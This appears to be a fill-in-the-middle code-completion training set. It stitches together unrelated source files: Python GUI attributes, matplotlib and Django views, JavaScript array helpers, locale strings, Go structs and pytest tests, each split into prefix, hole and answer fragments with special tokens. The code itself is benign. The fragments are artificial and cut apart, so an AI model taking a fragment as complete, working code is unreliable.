super(Text_Horizontal_Alignment, self).__init__('list', value)
class Text_Vertical_Alignment(Attribute):
tooltip = 'Vertical Alignment of text'
options = ['top', 'bottom', 'vertical center']
def __init__(self, value):
super(Text_Vertical_Alignment, self).__init__('list', value)
# Layout configuration related
class Layout_Config(Attribute):
options = ['horizontal', 'vertical', 'grid', 'anchor']
editable = False
def __init__(self, value):
super(Layout_Config, self).__init__('dictionary_list', value)
class Root(Attribute):
tooltip = 'What acts as the local anchor for this object?'
options = ['top left', 'top right',
'bottom left', 'bottom right',
'center left', 'center right',
'top center', 'bottom center']
def __init__(self, value):
super(Root, self).__init__('list', value)
class Anchor(Attribute):
tooltip = 'What other object:point acts as the anchor for this object?'
options = ['top left', 'top right',
'bottom left', 'bottom right',
'center left', 'center right',
'top center', 'bottom center']
editable = False
def __init__(self, value):
super(Anchor, self).__init__('dictionary_reference', value)
# Association
class Source(Attribute):
tooltip = 'What is the external oobject source reference for this object'
def __init__(self, value):
super(Source, self).__init__('string', value)
class Destination(Attribute):
tooltip = 'What is the object destination reference for this object'
def __init__(self, value):
super(Destination, self).__init__('string', value)<|fim▁end|> |
def __init__(self, value): |
<|file_name|>logHist.py<|end_file_name|><|fim▁begin|>import matplotlib.pyplot as plt
import numpy as np
def logHist(X, N=30,fig=None, noclear=False, pdf=False, **kywds):
'''
Plot logarithmic histogram or probability density function from
sampled data.
Args:
X (numpy.ndarray): 1-D array of sampled values
N (Optional[int]): Number of bins (default 30)
fig (Optional[int]): Figure number (default None)
noclear (Optioanl[bool]): Clear figure (default False)
pdf (Optional[bool]): If True normalize by bin width (default False)
and display as curve instead of bar chart.
Note: results are always normalized by number of samples
**kywds: Arbitrary keyword arguments passed to matplotlib.pyplot.bar <|fim▁hole|> Returns:
x (ndarray): abscissa values of frequencies
n (ndarray): (normalized) frequency values
'''
x = np.logspace(np.log10(np.min(X)),np.log10(np.max(X)),N+1)
n,x = np.histogram(X,bins=x)
n = n/float(X.size)
plt.figure(fig)
if not noclear: plt.clf()
if pdf:
n /= np.diff(x)
x = x[:-1]+np.diff(x)/2
plt.semilogx(x,n,**kywds)
else:
plt.bar(x[:len(x)-1],n,width=np.diff(x),**kywds)
a = plt.gca()
a.set_xlim(10.**np.floor(np.log10(np.min(X))),10.**np.ceil(np.log10(np.max(X))))
a.set_xscale('log')
plt.axis()
return x,n<|fim▁end|> | (or matplotlib.pyplot.semilogx if pdf is True)
|
<|file_name|>views.py<|end_file_name|><|fim▁begin|>from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.template import RequestContext
from django.shortcuts import render_to_response
from django.utils.translation import ugettext
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from models import InvitationError, Invitation, InvitationStats
from forms import InvitationForm, RegistrationFormInvitation
from registration.signals import user_registered
def apply_extra_context(context, extra_context=None):
if extra_context is None:
extra_context = {}
for key, value in extra_context.items():
context[key] = callable(value) and value() or value
return context
@login_required
def invite(request, success_url=None,
form_class=InvitationForm,
template_name='invitation/invitation_form.html',
extra_context=None):
"""
Create an invitation and send invitation email.
Send invitation email and then redirect to success URL if the
invitation form is valid. Redirect named URL ``invitation_unavailable``
on InvitationError. Render invitation form template otherwise.
**Required arguments:**
None.
**Optional arguments:**
:success_url:
The URL to redirect to on successful registration. Default value is
``None``, ``invitation_complete`` will be resolved in this case.
:form_class:
A form class to use for invitation. Takes ``request.user`` as first
argument to its constructor. Must have an ``email`` field. Custom
validation can be implemented here.
:template_name:
A custom template to use. Default value is
``invitation/invitation_form.html``.
:extra_context:
A dictionary of variables to add to the template context. Any
callable object in this dictionary will be called to produce
the end result which appears in the context.
**Template:**
``invitation/invitation_form.html`` or ``template_name`` keyword
argument.
**Context:**
A ``RequestContext`` instance is used rendering the template. Context,
in addition to ``extra_context``, contains:<|fim▁hole|> :form:
The invitation form.
"""
if request.method == 'POST':
form = form_class(request.POST, request.FILES)
if form.is_valid():
try:
invitation = Invitation.objects.invite(
request.user, form.cleaned_data["email"], form.cleaned_data["message"])
except InvitationError, e:
print '****'
print e
print '****'
return HttpResponseRedirect(reverse('invitation_unavailable'))
invitation.send_email(request=request)
if 'next' in request.REQUEST:
return HttpResponseRedirect(request.REQUEST['next'])
return HttpResponseRedirect(success_url or reverse('invitation_complete'))
else:
form = form_class()
context = apply_extra_context(RequestContext(request), extra_context)
return render_to_response(template_name,
{'form': form},
context_instance=context)
def register(request,
invitation_key,
wrong_key_template='invitation/wrong_invitation_key.html',
redirect_to_if_authenticated='/',
success_url=None,
form_class=RegistrationFormInvitation,
template_name='registration/registration_form.html',
extra_context=None):
"""
Allow a new user to register via invitation.
Send invitation email and then redirect to success URL if the
invitation form is valid. Redirect named URL ``invitation_unavailable``
on InvitationError. Render invitation form template otherwise. Sends
registration.signals.user_registered after creating the user.
**Required arguments:**
:invitation_key:
An invitation key in the form of ``[\da-e]{40}``
**Optional arguments:**
:wrong_key_template:
Template to be used when an invalid invitation key is supplied.
Default value is ``invitation/wrong_invitation_key.html``.
:redirect_to_if_authenticated:
URL to be redirected when an authenticated user calls this view.
Defaults value is ``/``
:success_url:
The URL to redirect to on successful registration. Default value is
``None``, ``invitation_registered`` will be resolved in this case.
:form_class:
A form class to use for registration. Takes the invited email as first
argument to its constructor.
:template_name:
A custom template to use. Default value is
``registration/registration_form.html``.
:extra_context:
A dictionary of variables to add to the template context. Any
callable object in this dictionary will be called to produce
the end result which appears in the context.
**Templates:**
``invitation/invitation_form.html`` or ``template_name`` keyword
argument as the *main template*.
``invitation/wrong_invitation_key.html`` or ``wrong_key_template`` keyword
argument as the *wrong key template*.
**Context:**
``RequestContext`` instances are used rendering both templates. Context,
in addition to ``extra_context``, contains:
For wrong key template
:invitation_key: supplied invitation key
For main template
:form:
The registration form.
"""
if request.user.is_authenticated():
return HttpResponseRedirect(redirect_to_if_authenticated)
try:
invitation = Invitation.objects.find(invitation_key)
except Invitation.DoesNotExist:
context = apply_extra_context(RequestContext(request), extra_context)
return render_to_response(wrong_key_template,
{'invitation_key': invitation_key},
context_instance=context)
if request.method == 'POST':
form = form_class(invitation.email, request.POST, request.FILES)
if form.is_valid():
new_user = form.save()
invitation.mark_accepted(new_user)
user_registered.send(sender="invitation",
user=new_user,
request=request)
# return HttpResponseRedirect(success_url or reverse('invitation_registered'))
# return HttpResponseRedirect(success_url or reverse('profiles-profile-detail', kwargs={'slug':new_user.username}))
return HttpResponseRedirect(success_url or reverse('auth_login'))
else:
form = form_class(invitation.email)
context = apply_extra_context(RequestContext(request), extra_context)
return render_to_response(template_name,
{'form': form},
context_instance=context)
@staff_member_required
def reward(request):
"""
Add invitations to users with high invitation performance and redirect
refferring page.
"""
rewarded_users, invitations_given = InvitationStats.objects.reward()
if rewarded_users:
message = ugettext(u'%(users)s users are given a total of ' \
u'%(invitations)s invitations.') % {
'users': rewarded_users,
'invitations': invitations_given}
else:
message = ugettext(u'No user has performance above ' \
u'threshold, no invitations awarded.')
request.user.message_set.create(message=message)
return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))<|fim▁end|> | |
<|file_name|>array.js<|end_file_name|><|fim▁begin|>var nextTick = null;
if (process) {
if ('nextTick' in process) {
nextTick = process.nextTick;
if (typeof module !== 'undefined') {
if ('exports' in module)
module.exports = Array;
}
}
}
if (!nextTick) {
// For support general browser, using setTimeout instead of process.nextTick
nextTick = function(func) {
setTimeout(func, 0);
};
}
var forEachAsync = function(callback, complete) {
var self = this;
function next(index, length) {
var self = this;
if (index >= length) {
if (complete)
complete.apply(this, [ true ]);
return;
}
function _next(stop) {
if (stop === false) {
if (complete)
complete.apply(this, [ false ]);
return;
}
nextTick(function() {
if (ret === false) {
if (complete)
complete.apply(this, [ false ]);
return;
}
next.apply(self, [ index + 1, length ]);
});
}
var ret = callback.apply(self, [ self[index], index, self, _next ]);
if (ret != true)
_next();
}
next.apply(self, [ 0, self.length ]);
};
if (!Array.prototype.forEachAsync)
Object.defineProperty(Array.prototype, 'forEachAsync', { value: forEachAsync });
var parallel = function(workerNumber, callback, complete) {
if (!callback)
return;
var self = this;
var completed = 0;
var total = self.length;
var workerCount = 0;
var currentIndex = 0;
if (total == 0) {
if (complete)
complete();
return;
}
function _complete() {
completed++;
workerCount--;
<|fim▁hole|> } else {
// Next item
nextTick(function() {
currentIndex++;
_parallel(currentIndex);
});
}
}
function _parallel(index) {
if (index >= total)
return;
if (workerCount < workerNumber) {
workerCount++;
if (workerCount < workerNumber) {
// New worker
nextTick(function() {
currentIndex++;
_parallel(currentIndex);
});
}
// Customized callback function
callback(self[index], index, self, _complete);
} else {
nextTick(function() {
_parallel(index);
});
}
}
_parallel(currentIndex);
}
if (!Array.prototype.parallel)
Object.defineProperty(Array.prototype, 'parallel', { value: parallel });<|fim▁end|> | if (workerCount == 0 && completed >= total) {
if (complete)
complete(); |
<|file_name|>unittest_strings.py<|end_file_name|><|fim▁begin|># Copyright (c) 2015-2018, 2020 Claudiu Popa <[email protected]>
# Copyright (c) 2016 Derek Gustafson <[email protected]>
# Copyright (c) 2018 Lucas Cimon <[email protected]>
# Copyright (c) 2018 Yury Gribov <[email protected]>
# Copyright (c) 2019-2021 Pierre Sassoulas <[email protected]>
# Copyright (c) 2019 Ashley Whetter <[email protected]>
# Copyright (c) 2020 hippo91 <[email protected]>
# Copyright (c) 2021 Daniël van Noord <[email protected]>
# Copyright (c) 2021 Marc Mueller <[email protected]>
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/main/LICENSE
from pylint.checkers import strings
TEST_TOKENS = (
'"X"',
"'X'",
"'''X'''",
'"""X"""',
'r"X"',
"R'X'",
'u"X"',
"F'X'",
'f"X"',
"F'X'",
'fr"X"',
'Fr"X"',
'fR"X"',
'FR"X"',
'rf"X"',
'rF"X"',
'Rf"X"',<|fim▁hole|>
def test_str_eval() -> None:
for token in TEST_TOKENS:
assert strings.str_eval(token) == "X"<|fim▁end|> | 'RF"X"',
) |
<|file_name|>testfuncs.py<|end_file_name|><|fim▁begin|>import sys, re
if sys.version_info < (3, 0):
import testcase
import modules.cssfuncs as funcs
else:
from . import testcase
from ..modules import cssfuncs as funcs
class TestFunctions(testcase.TestCase):
title = "CSS Functions"
def test_functions(self):
self.set_text( self.input() )
self.text_equals( self.input() )
self.compile()
self.find( re.escape(self.result()) )
self.decompile()
self.text_equals( self.input() )
def vars(self):<|fim▁hole|>* @transition = transition(all 0.3s ease)
* @transform = transform(rotate(7.deg))
* @gradient1 = linear-gradient(#fff, #f00)
* @gradient2 = linear-gradient(to top, #fff, #f00)
* @gradient3 = linear-gradient(to bottom , #fff, #f00)
*/
"""
def input(self):
return self.vars()+"""
h1 {
@box-shadow;
@transform;
@transition;
@gradient1;
@gradient2;
@gradient3;
}
"""
def result(self):
return self.vars()+"""
h1 {
-webkit-box-shadow: 0 0 4px #ff0;
box-shadow: 0 0 4px #ff0;
-webkit-transform: rotate(7.deg);
-ms-transform: rotate(7.deg);
transform: rotate(7.deg);
-webkit-transition: all 0.3s ease;
transition: all 0.3s ease;
background-image: -webkit-linear-gradient(bottom, #fff, #f00);
background-image: linear-gradient(to top, #fff, #f00);
background-image: -webkit-linear-gradient(bottom, #fff, #f00);
background-image: linear-gradient(to top, #fff, #f00);
background-image: -webkit-linear-gradient(top, #fff, #f00);
background-image: linear-gradient(to bottom , #fff, #f00);
}
"""<|fim▁end|> | return """
/*
* @box-shadow = box-shadow(0 0 4px #ff0) |
<|file_name|>group__spi__interface__gr.js<|end_file_name|><|fim▁begin|>var group__spi__interface__gr =
[
[ "Status Error Codes", "group__spi__execution__status.html", "group__spi__execution__status" ],
[ "SPI Events", "group__SPI__events.html", "group__SPI__events" ],
[ "SPI Control Codes", "group__SPI__control.html", "group__SPI__control" ],
[ "ARM_DRIVER_SPI", "group__spi__interface__gr.html#structARM__DRIVER__SPI", [
[ "GetVersion", "group__spi__interface__gr.html#a8834b281da48583845c044a81566c1b3", null ],
[ "GetCapabilities", "group__spi__interface__gr.html#a065b5fc24d0204692f0f95a44351ac1e", null ],
[ "Initialize", "group__spi__interface__gr.html#afac50d0b28860f7b569293e6b713f8a4", null ],
[ "Uninitialize", "group__spi__interface__gr.html#adcf20681a1402869ecb5c6447fada17b", null ],
[ "PowerControl", "group__spi__interface__gr.html#aba8f1c8019af95ffe19c32403e3240ef", null ],
[ "Send", "group__spi__interface__gr.html#a44eedddf4428cf4b98883b6c27d31922", null ],
[ "Receive", "group__spi__interface__gr.html#adb9224a35fe16c92eb0dd103638e4cf3", null ],
[ "Transfer", "group__spi__interface__gr.html#ad88b63ed74c03ba06b0599ab06ad4cf7", null ],
[ "GetDataCount", "group__spi__interface__gr.html#ad1d892ab3932f65cd7cdf2d0a91ae5da", null ],
[ "Control", "group__spi__interface__gr.html#a6e0f47a92f626a971c5197fca6545505", null ],
[ "GetStatus", "group__spi__interface__gr.html#a7305e7248420cdb4b02ceba87672178d", null ]
] ],
[ "ARM_SPI_CAPABILITIES", "group__spi__interface__gr.html#structARM__SPI__CAPABILITIES", [
[ "simplex", "group__spi__interface__gr.html#af244e2c2facf6414e3886495ee6b40bc", null ],
[ "ti_ssi", "group__spi__interface__gr.html#a8053c540e5d531b692224bdc2463f36a", null ],
[ "microwire", "group__spi__interface__gr.html#a9b4e858eb1d414128994742bf121f94c", null ],
[ "event_mode_fault", "group__spi__interface__gr.html#a309619714f0c4febaa497ebdb9b7e3ca", null ],
[ "reserved", "group__spi__interface__gr.html#aa43c4c21b173ada1b6b7568956f0d650", null ]
] ],
[ "ARM_SPI_STATUS", "group__spi__interface__gr.html#structARM__SPI__STATUS", [
<|fim▁hole|> ] ],
[ "ARM_SPI_SignalEvent_t", "group__spi__interface__gr.html#gafde9205364241ee81290adc0481c6640", null ],
[ "ARM_SPI_GetVersion", "group__spi__interface__gr.html#gad5db9209ef1d64a7915a7278d6a402c8", null ],
[ "ARM_SPI_GetCapabilities", "group__spi__interface__gr.html#gaf4823a11ab5efcd47c79b13801513ddc", null ],
[ "ARM_SPI_Initialize", "group__spi__interface__gr.html#ga1a3c11ed523a4355cd91069527945906", null ],
[ "ARM_SPI_Uninitialize", "group__spi__interface__gr.html#ga0c480ee3eabb82fc746e89741ed2e03e", null ],
[ "ARM_SPI_PowerControl", "group__spi__interface__gr.html#ga1a1e7e80ea32ae381b75213c32aa8067", null ],
[ "ARM_SPI_Send", "group__spi__interface__gr.html#gab2a303d1071e926280d50682f4808479", null ],
[ "ARM_SPI_Receive", "group__spi__interface__gr.html#ga726aff54e782ed9b47f7ba1280a3d8f6", null ],
[ "ARM_SPI_Transfer", "group__spi__interface__gr.html#gaa24026b3822c10272e301f1505136ec2", null ],
[ "ARM_SPI_GetDataCount", "group__spi__interface__gr.html#gaaaecaaf4ec1922f22e7f9de63af5ccdb", null ],
[ "ARM_SPI_Control", "group__spi__interface__gr.html#gad18d229992598d6677bec250015e5d1a", null ],
[ "ARM_SPI_GetStatus", "group__spi__interface__gr.html#ga60d33d8788a76c388cc36e066240b817", null ],
[ "ARM_SPI_SignalEvent", "group__spi__interface__gr.html#ga505b2d787348d51351d38fee98ccba7e", null ]
];<|fim▁end|> | [ "busy", "group__spi__interface__gr.html#a50c88f3c1d787773e2ac1b59533f034a", null ],
[ "data_lost", "group__spi__interface__gr.html#a9675630df67587ecd171c7ef12b9d22a", null ],
[ "mode_fault", "group__spi__interface__gr.html#aeaf54ec655b7a64b9e88578c5f39d4e3", null ],
[ "reserved", "group__spi__interface__gr.html#aa43c4c21b173ada1b6b7568956f0d650", null ]
|
<|file_name|>icon.go<|end_file_name|><|fim▁begin|>// Copyright 2016-2020 The Libsacloud Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");<|fim▁hole|>// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package sacloud
// Icon アイコン
type Icon struct {
*Resource // ID
propAvailability // 有功状態
propName // 名称
propScope // スコープ
propTags // タグ
propCreatedAt // 作成日時
propModifiedAt // 変更日時
URL string `json:",omitempty"` // アイコンURL
Image string `json:",omitempty"` // 画像データBase64文字列(Sizeパラメータ指定時 or 画像アップロード時に利用)
}
// Image 画像データBASE64文字列
type Image string
// GetURL アイコン画像URL取得
func (icon *Icon) GetURL() string {
return icon.URL
}
// GetImage アイコン画像データ(base64)取得
func (icon *Icon) GetImage() string {
return icon.Image
}
// SetImage アイコン画像データ(base64)設定
func (icon *Icon) SetImage(image string) {
icon.Image = image
}<|fim▁end|> | // you may not use this file except in compliance with the License. |
<|file_name|>platform.py<|end_file_name|><|fim▁begin|># Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
class Platform(object):
"""The platform that the target browser is running on.
Provides a limited interface to obtain stats from the platform itself, where<|fim▁hole|> """Platforms may be able to collect GL surface stats."""
class StubSurfaceCollector(object):
def __init__(self, trace_tag):
pass
def __enter__(self):
pass
def __exit__(self, *args):
pass
return StubSurfaceCollector(trace_tag)<|fim▁end|> | possible.
"""
def GetSurfaceCollector(self, trace_tag): |
<|file_name|>el.js<|end_file_name|><|fim▁begin|>/*
* CKFinder
* ========
* http://ckfinder.com
* Copyright (C) 2007-2011, CKSource - Frederico Knabben. All rights reserved.
*
* The software, this file and its contents are subject to the CKFinder
* License. Please read the license.txt file before using, installing, copying,
* modifying or distribute this file or part of its contents. The contents of
* this file is part of the Source Code of CKFinder.
*
*/
/**
* @fileOverview
*/
/**
* Constains the dictionary of language entries.
* @namespace
*/
CKFinder.lang['el'] =
{
appTitle : 'CKFinder', // MISSING
// Common messages and labels.
common :
{
// Put the voice-only part of the label in the span.
unavailable : '%1<span class="cke_accessibility">, unavailable</span>', // MISSING
confirmCancel : 'Some of the options have been changed. Are you sure to close the dialog?', // MISSING
ok : 'OK', // MISSING
cancel : 'Cancel', // MISSING
confirmationTitle : 'Confirmation', // MISSING
messageTitle : 'Information', // MISSING
inputTitle : 'Question', // MISSING
undo : 'Undo', // MISSING
redo : 'Redo', // MISSING
skip : 'Skip', // MISSING
skipAll : 'Skip all', // MISSING
makeDecision : 'What action should be taken?', // MISSING
rememberDecision: 'Remember my decision' // MISSING
},
<|fim▁hole|>
// Date Format
// d : Day
// dd : Day (padding zero)
// m : Month
// mm : Month (padding zero)
// yy : Year (two digits)
// yyyy : Year (four digits)
// h : Hour (12 hour clock)
// hh : Hour (12 hour clock, padding zero)
// H : Hour (24 hour clock)
// HH : Hour (24 hour clock, padding zero)
// M : Minute
// MM : Minute (padding zero)
// a : Firt char of AM/PM
// aa : AM/PM
DateTime : 'dd/mm/yyyy HH:MM',
DateAmPm : ['ΜΜ', 'ΠΜ'],
// Folders
FoldersTitle : 'Φάκελοι',
FolderLoading : 'Φόρτωση...',
FolderNew : 'Παρακαλούμε πληκτρολογήστε την ονομασία του νέου φακέλου: ',
FolderRename : 'Παρακαλούμε πληκτρολογήστε την νέα ονομασία του φακέλου: ',
FolderDelete : 'Είστε σίγουροι ότι θέλετε να διαγράψετε το φάκελο "%1";',
FolderRenaming : ' (Μετονομασία...)',
FolderDeleting : ' (Διαγραφή...)',
// Files
FileRename : 'Παρακαλούμε πληκτρολογήστε την νέα ονομασία του αρχείου: ',
FileRenameExt : 'Είστε σίγουροι ότι θέλετε να αλλάξετε την επέκταση του αρχείου; Μετά από αυτή την ενέργεια το αρχείο μπορεί να μην μπορεί να χρησιμοποιηθεί',
FileRenaming : 'Μετονομασία...',
FileDelete : 'Είστε σίγουροι ότι θέλετε να διαγράψετε το αρχείο "%1"?',
FilesLoading : 'Loading...', // MISSING
FilesEmpty : 'Empty folder', // MISSING
FilesMoved : 'File %1 moved into %2:%3', // MISSING
FilesCopied : 'File %1 copied into %2:%3', // MISSING
// Basket
BasketFolder : 'Basket', // MISSING
BasketClear : 'Clear Basket', // MISSING
BasketRemove : 'Remove from basket', // MISSING
BasketOpenFolder : 'Open parent folder', // MISSING
BasketTruncateConfirm : 'Do you really want to remove all files from the basket?', // MISSING
BasketRemoveConfirm : 'Do you really want to remove the file "%1" from the basket?', // MISSING
BasketEmpty : 'No files in the basket, drag\'n\'drop some.', // MISSING
BasketCopyFilesHere : 'Copy Files from Basket', // MISSING
BasketMoveFilesHere : 'Move Files from Basket', // MISSING
BasketPasteErrorOther : 'File %s error: %e', // MISSING
BasketPasteMoveSuccess : 'The following files were moved: %s', // MISSING
BasketPasteCopySuccess : 'The following files were copied: %s', // MISSING
// Toolbar Buttons (some used elsewhere)
Upload : 'Μεταφόρτωση',
UploadTip : 'Μεταφόρτωση Νέου Αρχείου',
Refresh : 'Ανανέωση',
Settings : 'Ρυθμίσεις',
Help : 'Βοήθεια',
HelpTip : 'Βοήθεια',
// Context Menus
Select : 'Επιλογή',
SelectThumbnail : 'Επιλογή Μικρογραφίας',
View : 'Προβολή',
Download : 'Λήψη Αρχείου',
NewSubFolder : 'Νέος Υποφάκελος',
Rename : 'Μετονομασία',
Delete : 'Διαγραφή',
CopyDragDrop : 'Copy file here', // MISSING
MoveDragDrop : 'Move file here', // MISSING
// Dialogs
RenameDlgTitle : 'Rename', // MISSING
NewNameDlgTitle : 'New name', // MISSING
FileExistsDlgTitle : 'File already exists', // MISSING
SysErrorDlgTitle : 'System error', // MISSING
FileOverwrite : 'Overwrite', // MISSING
FileAutorename : 'Auto-rename', // MISSING
// Generic
OkBtn : 'OK',
CancelBtn : 'Ακύρωση',
CloseBtn : 'Κλείσιμο',
// Upload Panel
UploadTitle : 'Μεταφόρτωση Νέου Αρχείου',
UploadSelectLbl : 'επιλέξτε το αρχείο που θέλετε να μεταφερθεί κάνοντας κλίκ στο κουμπί',
UploadProgressLbl : '(Η μεταφόρτωση εκτελείται, παρακαλούμε περιμένετε...)',
UploadBtn : 'Μεταφόρτωση Επιλεγμένου Αρχείου',
UploadBtnCancel : 'Cancel', // MISSING
UploadNoFileMsg : 'Παρακαλούμε επιλέξτε ένα αρχείο από τον υπολογιστή σας',
UploadNoFolder : 'Please select folder before uploading.', // MISSING
UploadNoPerms : 'File upload not allowed.', // MISSING
UploadUnknError : 'Error sending the file.', // MISSING
UploadExtIncorrect : 'File extension not allowed in this folder.', // MISSING
// Settings Panel
SetTitle : 'Ρυθμίσεις',
SetView : 'Προβολή:',
SetViewThumb : 'Μικρογραφίες',
SetViewList : 'Λίστα',
SetDisplay : 'Εμφάνιση:',
SetDisplayName : 'Όνομα Αρχείου',
SetDisplayDate : 'Ημερομηνία',
SetDisplaySize : 'Μέγεθος Αρχείου',
SetSort : 'Ταξινόμηση:',
SetSortName : 'βάσει Όνοματος Αρχείου',
SetSortDate : 'βάσει Ημερομήνιας',
SetSortSize : 'βάσει Μεγέθους',
// Status Bar
FilesCountEmpty : '<Κενός Φάκελος>',
FilesCountOne : '1 αρχείο',
FilesCountMany : '%1 αρχεία',
// Size and Speed
Kb : '%1 kB',
KbPerSecond : '%1 kB/s',
// Connector Error Messages.
ErrorUnknown : 'Η ενέργεια δεν ήταν δυνατόν να εκτελεστεί. (Σφάλμα %1)',
Errors :
{
10 : 'Λανθασμένη Εντολή.',
11 : 'Το resource type δεν ήταν δυνατόν να προσδιορίστεί.',
12 : 'Το resource type δεν είναι έγκυρο.',
102 : 'Το όνομα αρχείου ή φακέλου δεν είναι έγκυρο.',
103 : 'Δεν ήταν δυνατή η εκτέλεση της ενέργειας λόγω έλλειψης δικαιωμάτων ασφαλείας.',
104 : 'Δεν ήταν δυνατή η εκτέλεση της ενέργειας λόγω περιορισμών του συστήματος αρχείων.',
105 : 'Λανθασμένη Επέκταση Αρχείου.',
109 : 'Λανθασμένη Ενέργεια.',
110 : 'Άγνωστο Λάθος.',
115 : 'Το αρχείο ή φάκελος υπάρχει ήδη.',
116 : 'Ο φάκελος δεν βρέθηκε. Παρακαλούμε ανανεώστε τη σελίδα και προσπαθήστε ξανά.',
117 : 'Το αρχείο δεν βρέθηκε. Παρακαλούμε ανανεώστε τη σελίδα και προσπαθήστε ξανά.',
118 : 'Source and target paths are equal.', // MISSING
201 : 'Ένα αρχείο με την ίδια ονομασία υπάρχει ήδη. Το μεταφορτωμένο αρχείο μετονομάστηκε σε "%1"',
202 : 'Λανθασμένο Αρχείο',
203 : 'Λανθασμένο Αρχείο. Το μέγεθος του αρχείου είναι πολύ μεγάλο.',
204 : 'Το μεταφορτωμένο αρχείο είναι χαλασμένο.',
205 : 'Δεν υπάρχει προσωρινός φάκελος για να χρησιμοποιηθεί για τις μεταφορτώσεις των αρχείων.',
206 : 'Η μεταφόρτωση ακυρώθηκε για λόγους ασφαλείας. Το αρχείο περιέχει δεδομένα μορφής HTML.',
207 : 'Το μεταφορτωμένο αρχείο μετονομάστηκε σε "%1"',
300 : 'Moving file(s) failed.', // MISSING
301 : 'Copying file(s) failed.', // MISSING
500 : 'Ο πλοηγός αρχείων έχει απενεργοποιηθεί για λόγους ασφαλείας. Παρακαλούμε επικοινωνήστε με τον διαχειριστή της ιστοσελίδας και ελέγξτε το αρχείο ρυθμίσεων του πλοηγού (CKFinder).',
501 : 'Η υποστήριξη των μικρογραφιών έχει απενεργοποιηθεί.'
},
// Other Error Messages.
ErrorMsg :
{
FileEmpty : 'Η ονομασία του αρχείου δεν μπορεί να είναι κενή',
FileExists : 'File %s already exists', // MISSING
FolderEmpty : 'Η ονομασία του φακέλου δεν μπορεί να είναι κενή',
FileInvChar : 'Η ονομασία του αρχείου δεν μπορεί να περιέχει τους ακόλουθους χαρακτήρες: \n\\ / : * ? " < > |',
FolderInvChar : 'Η ονομασία του φακέλου δεν μπορεί να περιέχει τους ακόλουθους χαρακτήρες: \n\\ / : * ? " < > |',
PopupBlockView : 'Δεν ήταν εφικτό να ανοίξει το αρχείο σε νέο παράθυρο. Παρακαλώ, ελέγξτε τις ρυθμίσεις τους πλοηγού σας και απενεργοποιήστε όλους τους popup blockers για αυτή την ιστοσελίδα.'
},
// Imageresize plugin
Imageresize :
{
dialogTitle : 'Resize %s', // MISSING
sizeTooBig : 'Cannot set image height or width to a value bigger than the original size (%size).', // MISSING
resizeSuccess : 'Image resized successfully.', // MISSING
thumbnailNew : 'Create new thumbnail', // MISSING
thumbnailSmall : 'Small (%s)', // MISSING
thumbnailMedium : 'Medium (%s)', // MISSING
thumbnailLarge : 'Large (%s)', // MISSING
newSize : 'Set new size', // MISSING
width : 'Width', // MISSING
height : 'Height', // MISSING
invalidHeight : 'Invalid height.', // MISSING
invalidWidth : 'Invalid width.', // MISSING
invalidName : 'Invalid file name.', // MISSING
newImage : 'Create new image', // MISSING
noExtensionChange : 'The file extension cannot be changed.', // MISSING
imageSmall : 'Source image is too small', // MISSING
contextMenuName : 'Resize' // MISSING
},
// Fileeditor plugin
Fileeditor :
{
save : 'Save', // MISSING
fileOpenError : 'Unable to open file.', // MISSING
fileSaveSuccess : 'File saved successfully.', // MISSING
contextMenuName : 'Edit', // MISSING
loadingFile : 'Loading file, please wait...' // MISSING
}
};<|fim▁end|> |
dir : 'ltr', // MISSING
HelpLang : 'en',
LangCode : 'el',
|
<|file_name|>0003_auto_20170118_1901.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-<|fim▁hole|>
from django.db import migrations, models
import django.forms.widgets
class Migration(migrations.Migration):
dependencies = [
('sshcomm', '0002_auto_20170118_1702'),
]
operations = [
migrations.AlterField(
model_name='userdata',
name='user_name',
field=models.CharField(max_length=128),
),
migrations.AlterField(
model_name='userdata',
name='user_password',
field=models.CharField(max_length=128, verbose_name=django.forms.widgets.PasswordInput),
),
]<|fim▁end|> | # Generated by Django 1.10.4 on 2017-01-18 18:01
from __future__ import unicode_literals |
<|file_name|>Utils.py<|end_file_name|><|fim▁begin|>__author__ = 'Tony Beltramelli - www.tonybeltramelli.com'
import string
import random
class Utils:
@staticmethod
def get_random_text(length_text=10, space_number=1, with_upper_case=True):
results = []
while len(results) < length_text:
char = random.choice(string.ascii_letters[:26])
results.append(char)
if with_upper_case:
results[0] = results[0].upper()
current_spaces = []
while len(current_spaces) < space_number:
space_pos = random.randint(2, length_text - 3)
if space_pos in current_spaces:
break
results[space_pos] = " "
if with_upper_case:
results[space_pos + 1] = results[space_pos - 1].upper()
current_spaces.append(space_pos)
return ''.join(results)
<|fim▁hole|> def get_ios_id(length=10):
results = []
while len(results) < length:
char = random.choice(string.digits + string.ascii_letters)
results.append(char)
results[3] = "-"
results[6] = "-"
return ''.join(results)
@staticmethod
def get_android_id(length=10):
results = []
while len(results) < length:
char = random.choice(string.ascii_letters)
results.append(char)
return ''.join(results)<|fim▁end|> | @staticmethod |
<|file_name|>BitSightForSecurityPerformanceManagement_test.py<|end_file_name|><|fim▁begin|>import demistomock as demisto
from CommonServerPython import BaseClient
import BitSightForSecurityPerformanceManagement as bitsight
from datetime import datetime
def test_get_companies_guid_command(mocker):
# Positive Scenario
client = bitsight.Client(base_url='https://test.com')
res = {"my_company": {"guid": "123"}, "companies": [{"name": "abc", "shortname": "abc", "guid": "123"}]}
mocker.patch.object(BaseClient, '_http_request', return_value=res)
_, outputs, _ = bitsight.get_companies_guid_command(client)
assert outputs[0].get('guid') == '123'
def test_get_company_details_command(mocker):
inp_args = {'guid': '123'}
client = bitsight.Client(base_url='https://test.com')
res = {"name": "abc"}
mocker.patch.object(BaseClient, '_http_request', return_value=res)
<|fim▁hole|>
def test_get_company_findings_command(mocker):
inp_args = {'guid': '123', 'first_seen': '2021-01-01', 'last_seen': '2021-01-02'}
client = bitsight.Client(base_url='https://test.com')
